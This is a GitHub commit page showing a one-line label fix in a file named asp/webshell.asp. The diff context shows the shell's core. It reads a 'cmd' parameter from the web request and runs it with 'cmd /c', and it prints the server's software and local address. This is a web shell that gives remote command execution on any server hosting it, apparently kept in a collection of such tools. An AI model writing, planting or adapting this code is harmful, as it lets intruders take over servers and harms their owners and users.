Skip to content

Commit acb55c6

Browse files
Fixed label
1 parent 7e6629a commit acb55c6

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

asp/webshell.asp

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -39,7 +39,7 @@ end Function
3939
<%Response.Write(Request.ServerVariables("server_software"))%>
4040
</p>
4141
<p>
42-
<b>The server's software:</b>
42+
<b>The server's local address:</b>
4343
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
4444
<% szCMD = request("cmd")
4545
thisDir = getCommandOutput("cmd /c" & szCMD)

0 commit comments

Comments
 (0)